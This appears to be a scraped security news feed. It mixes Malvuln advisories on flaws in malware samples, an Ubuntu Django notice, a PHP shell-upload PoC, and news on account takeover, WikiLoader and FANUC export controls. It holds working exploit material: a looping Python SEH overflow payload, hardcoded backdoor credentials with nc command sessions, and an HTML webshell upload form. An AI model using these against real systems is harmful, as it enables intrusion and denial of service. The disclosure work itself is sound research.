Backdoor.Win32.Symmi.qua malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Symmi.qua  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Symmi  
Type: PE32  
MD5: 6e81618678ddfee69342486f6b5ee780  
SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3  
Vuln ID: MVID-2024-0692  
Dropped files: ksomnbi.dll   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/03/2024

Memory Dump:  
(1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002  
eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:007> .ecxr  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

FAULTING_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

EXCEPTION_RECORD:  027ff23c -- (.exr 0x27ff23c)  
ExceptionAddress: 10001f32 (ksomnbi+0x00001f32)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 02800000  
Attempt to write to address 02800000

PROCESS_NAME:  Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  027ff28c -- (.cxr 0x27ff28c)  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00  
Resetting default scope

WRITE_ADDRESS:  02800000 

FOLLOWUP_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

FAULTING_THREAD:  000003f0

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 10002fc3 to 10001f32

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32  
027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3  
027fff84 41414141 41414141 41414141 41414141 0x41414141  
027fff88 41414141 41414141 41414141 41414141 0x41414141  
027fff8c 41414141 41414141 41414141 41414141 0x41414141  
027fff90 41414141 41414141 41414141 41414141 0x41414141  
027fff94 41414141 41414141 41414141 41414141 0x41414141  
027fff98 41414141 41414141 41414141 41414141 0x41414141  
027fff9c 41414141 41414141 41414141 41414141 0x41414141  
027fffa0 41414141 41414141 41414141 41414141 0x41414141  
027fffa4 41414141 41414141 41414141 41414141 0x41414141  
027fffa8 41414141 41414141 41414141 41414141 0x41414141  
027fffac 41414141 41414141 41414141 41414141 0x41414141  
027fffb0 41414141 41414141 41414141 41414141 0x41414141  
027fffb4 41414141 41414141 41414141 41414141 0x41414141  
027fffb8 41414141 41414141 41414141 41414141 0x41414141  
027fffbc 41414141 41414141 41414141 41414141 0x41414141  
027fffc0 41414141 41414141 41414141 41414141 0x41414141  
027fffc4 41414141 41414141 41414141 41414141 0x41414141  
027fffc8 41414141 41414141 41414141 41414141 0x41414141  
027fffcc 41414141 41414141 41414141 41414141 0x41414141  
027fffd0 41414141 41414141 41414141 41414141 0x41414141  
027fffd4 41414141 41414141 41414141 41414141 0x41414141  
027fffd8 41414141 41414141 41414141 41414141 0x41414141  
027fffdc 41414141 41414141 41414141 41414141 0x41414141  
027fffe0 41414141 41414141 41414141 41414141 0x41414141  
027fffe4 41414141 41414141 41414141 41414141 0x41414141  
027fffe8 41414141 41414141 41414141 41414141 0x41414141  
027fffec 41414141 41414141 41414141 41414141 0x41414141  
027ffff0 41414141 41414141 41414141 00000000 0x41414141  
027ffff4 41414141 41414141 00000000 00000000 0x41414141  
027ffff8 41414141 00000000 00000000 00000000 0x41414141  
027ffffc 00000000 00000000 00000000 00000000 0x41414141

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ksomnbi+1f32

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ksomnbi

IMAGE_NAME:  ksomnbi.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  537a7d0a

STACK_COMMAND:  .cxr 0x27ff28c ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32

Followup: MachineOwner  
---------

0:007> !exchain  
027ff0f0: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
027ff710: ksomnbi+30df (100030df)  
027fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

def doit():

    MALWARE_HOST="x.x.x.x"  
    PORT=6917   #random port

    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST  
    s.send(PAYLOAD.encode())  
    s.close()

while 1:  
    doit()  
    time.sleep(0.5)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Symmi.qua MVID-2024-0692 Buffer Overflow

HackTool.Win32.Freezer.br (WinSpy) malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2992129c565e025ebcb0bb6f80c77812.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: HackTool.Win32.Freezer.br (WinSpy)Vulnerability: Insecure Credential StorageDescription: The malware listens on TCP ports 443, 80 and provides a web interface for remote access to victim information like screenshots etc.The username "AZURE" is in a hidden in a file named "resu.dll" under AppData\Local\Temp\Compress0 and the password is stored in cleartext "DREAMS" in "ssap.dll"Family: FreezerType: PE32MD5: 2992129c565e025ebcb0bb6f80c77812SHA256: e47a267cdc2a8443d5d7184e1023eef81c4b6a5bf9ecc24f1c6c345fe98bab8eVuln ID: MVID-2024-0691Disclosure: 09/03/2024Exploit/PoC:Login to the Win-Spy web UI using the credentials "AZURE" / "DREAMS" Web URLs available on the infected host.WebCam Shots (0)http://VICTIM_MACHINE/audio/Screen Shots (16)http://VICTIM_MACHINE/pictures/Reports (2)http://VICTIM_MACHINE/documents/Downloadclog.txtlog.txtDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

HackTool.Win32.Freezer.br (WinSpy) MVID-2024-0691 Insecure Credential Storage

Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

Ubuntu Security Notice 6987-1 - It was discovered that Django incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service. It was discovered that Django incorrectly handled certain email sending failures. A remote attacker could possibly use this issue to enumerate user emails by issuing password reset requests and observing the outcomes.

==========================================================================  
Ubuntu Security Notice USN-6987-1  
September 03, 2024

python-django vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Django.

Software Description:  
- python-django: High-level Python web development framework

Details:

It was discovered that Django incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2024-45230)

It was discovered that Django incorrectly handled certain email sending  
failures. A remote attacker could possibly use this issue to enumerate  
user emails by issuing password reset requests and observing the outcomes.  
(CVE-2024-45231)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-django                  3:4.2.11-1ubuntu1.3

Ubuntu 22.04 LTS  
  python3-django                  2:3.2.12-2ubuntu1.14

Ubuntu 20.04 LTS  
  python3-django                  2:2.2.12-1ubuntu0.25

Ubuntu 18.04 LTS  
  python-django                   1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro  
  python3-django                  1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6987-1  
  CVE-2024-45230, CVE-2024-45231

Package Information:  
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.3  
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.14  
  https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.25

Ubuntu Security Notice USN-6987-1

Online Travel Agency System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Travel Agency System 1.0 Shell Upload

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the

SaaS Security / Browser Security

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the browser is the primary battleground where account takeover attacks unfold and, thus, where they should be neutralized. The report also provides effective guidance for mitigating the account takeover risk.

Below are some of the key points raised in the report:

**The Role of the Browser in Account Takeovers**

According to the report, the SaaS kill chain takes advantage of the fundamental components that are contained within the browser. For account takeover, these include:

*   **Executed Web Pages** - Attackers can create phishing login pages or use MiTM over legitimate web pages to harvest and access credentials.
*   **Browser Extensions** - Malicious extensions can access and exfiltrate sensitive data.
*   **Stored Credentials** - Attackers aim to hijack the browser or exfiltrate its stored credentials to access SaaS apps.

Once the user's credentials are compromised, the attacker can login to the apps and operate with impunity inside. This is a different and much shorter kill chain compared to the on-premises kill chain, which is also why traditional security measures fail to protect against it.

**Dissecting Account Takeover TTPs**

The report then details the main account takeover tactics, techniques and procedures (TTPs). It analyzes how they operate, why traditional security controls are ineffective in protecting against them, and how a browser security platform can mitigate the risk.

**1\. Phishing**

**The risk:** Phishing attacks abuse the way the browser executes the webpage. There are two main types of phishing attacks: a malicious login page or intercepting a legitimate one to capture session tokens.

**The protection failure:** SSE solutions and firewalls cannot protect against these attacks since the malicious web page components cannot be seen in network traffic. As a result, the phishing components are able to enter the perimeter and the user's endpoint.

**The solution:** A browser security platform provides visibility into the execution of web pages and analyzes every executed component, detecting phishing activities like credential input fields and MiTM redirection. Then, these components are disabled within the page.

**2\. Malicious Browser Extensions**

**The risk:** Malicious extensions exploit the high privileges enabled by users to control the browser's activity and data, taking over stored credentials.

**The protection failure:** EDRs and EPPs often have implicit trust in browser processes, making extensions a security blind spot.

**The solution:** A browser security platform provides visibility and risk analysis of all extensions and automatically disables malicious ones.

**3\. Authentication and Access via a Login Page**

**The risk:** Once the attacker obtains credentials, they can access the targeted SaaS app.

**The protection failure:** IdPs struggle to differentiate between malicious and legitimate users and MFA solutions are often not fully implemented and adopted.

**The solution:** A browser security platform monitors all stored credentials in the browser, integrates with the IdP to act as an additional authentication factor, and enforces access from the browser to prevent access through compromised credentials.

**What's Next for Security Decision Makers**

The browser has become a critical attack surface for enterprises, and account takeover attacks exemplify its risk and the need to adapt the organizational security approach. LayerX has identified that a browser security solution is the key component in that shift, countering existing attack techniques that will force attackers to reevaluate their steps. Read the full report .

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The New Effective Way to Prevent Account Takeovers

A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign.

The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers

Malware / Network Security

A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign.

The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers Mark Lim and Tom Marsden said.

WikiLoader, first documented by Proofpoint in August 2023, has been attributed to a threat actor known as TA544, with the email attacks leveraging the malware to deploy Danabot and Ursnif.

Then earlier this April, South Korean cybersecurity company AhnLab detailed an attack campaign that leveraged a trojanized version of a Notepad++ plugin as the distribution vector.

That said, the loader for rent is suspected to be used by at least two initial access brokers (IABs), per Unit 42, stating the attack chains are characterized by tactics that allow it to evade detection by security tools.

"Attackers commonly use SEO poisoning as an initial access vector to trick people into visiting a page that spoofs the legitimate search result to deliver malware rather than the searched-for product," the researchers said.

"This campaign's delivery infrastructure leveraged cloned websites relabeled as GlobalProtect along with cloud-based Git repositories."

Thus, users who end up searching for the GlobalProtect software are displayed Google ads that, upon clicking, redirect users to a fake GlobalProtect download page, effectively triggering the infection sequence.

The MSI installer includes an executable ("GlobalProtect64.exe") that, in reality, is a renamed version of a legitimate share trading application from TD Ameritrade (now part of Charles Schwab) used to sideload a malicious DLL named "i4jinst.dll."

This paves the way for the execution of shellcode that goes through a sequence of steps to ultimately download and launch the WikiLoader backdoor from a remote server.

To further improve the perceived legitimacy of the installer and deceive victims, a fake error message is displayed at the end of the whole process, stating certain libraries are missing from their Windows computers.

Besides using renamed versions of legitimate software for sideloading the malware, the threat actors have incorporated anti-analysis checks that determine if WikiLoader is running in a virtualized environment and terminate itself when processes related to virtual machine software are found.

While the reason for the shift from phishing to SEO poisoning as a spreading mechanism is unclear, Unit 42 theorized that it's possible the campaign is the work of another IAB or that existing groups delivering the malware have done so in response to public disclosure.

"The combination of spoofed, compromised and legitimate infrastructure leveraged by WikiLoader campaigns reinforces the malware authors attention to building an operationally secure and robust loader, with multiple \[command-and-control\] configurations," the researchers said.

The disclosure comes days after Trend Micro uncovered a new campaign that also leverages a fake GlobalProtect VPN software to infect users in the Middle East with backdoor malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware Attack

Activists claim Japanese industrial robots are being used to build military equipment for Israel. The robot maker denies the claims, but the episode reveals the complex ethics of global manufacturing.

Activists in Japan earlier this year accused one of the country’s largest robotics manufacturers of profiting off the war in Gaza, accusing it of violating its own company policies in aiding the Israeli defense industry.

At a protest outside the headquarters of FANUC Corporation earlier this summer, the Boycott, Divestment, and Sanctions (BDS) protesters demanded the Japanese conglomerate cut off ties with Israel and all the defense companies that contribute to Israel's military.

“We also call on FANUC not to be further complicit in genocide, war crimes, and crimes against humanity,” Taizo Imano, one of the protest organizers, said in June.

Specifically, Imano and the rest of the BDS activists believe Japan is breaching its own export controls. If true, it would significantly alter how Israel acquires high-end machinery for its defense sector. He further believes that “selling such products to a country that continues to commit genocide is itself a violation of international laws and obligations.” Experts say it may not be so simple.

FANUC has flatly rejected that claim. (And Israel has denied claims that it is committing genocide against Palestinians.) While the company has not responded to WIRED’s litany of requests for comment, a spokesperson for FANUC told HuffPost’s Japanese-language site in March that “when we sell products for Israel, we will carry out the necessary transaction screening.” If the end use of the technology is for military use, they wrote, the company will decide “not to sell.”

The activists, however, highlight how blurry the line between civilian and military technology has grown in recent years—and how difficult it can be to foresee the ways this kind of technology will be used one, two, or 15 years into the future. Trade lawyers consulted by WIRED say the law is both clear and outdated.

FANUC, based in Yamanashi Prefecture, is one of the largest robotics companies in the world, posting nearly $6 billion in sales during the 2023 fiscal year. The company’s robotic arms and automated systems are ubiquitous on automotive assembly plants, capable of doing the high-accuracy welding and laser work necessary in aerospace manufacturing, and have become commonplace in plastics, packaging, and a variety of other sectors.

As one of the world’s largest robotics companies, FANUC has also historically exported its kit to the North America and European defense industry. Its robots have been part of the F-35 manufacturing process for more than a decade; it previously worked with GE to produce onboard electronics for the M1A2 Abrams tank; FANUC robots are used in Raytheon’s missile production in Arizona; and it helped the United Kingdom create a quick and efficient production process for its 155-mm artillery shells.

Plenty of technologies that have such clear civilian and military use are classified as “dual use” technologies. While that designation can mean different things in different contexts, export control regimes are generally designed to ensure the use of this technology is controlled and monitored. Countries may exempt friendly nations from these sort of export requirements.

Japan, for example, makes it relatively easy to export dual-use technologies to the United States and Europe, and vice versa. Because they are recognized as trusted countries under Japanese export law, companies in those states are generally free to use Japanese dual-use technology to produce arms—and to, in turn, export those arms to other states (subject to their own export controls).

This, itself, has drawn the BDS activists’ ire: They want FANUC to end its relationship with American defense contractors like General Dynamics and Lockheed Martin, which sell considerable advanced weaponry to Israel. “We demand that such business relationships be immediately terminated and that the two companies never do business with each other again,” Imano said in June. But the activists go further, arguing that FANUC is, despite what it says publicly, actually doing business with Israeli defense firms.

“FANUC sells its robots and provides maintenance and inspection services to Israeli military companies such as Elbit Systems,” Imano claimed.

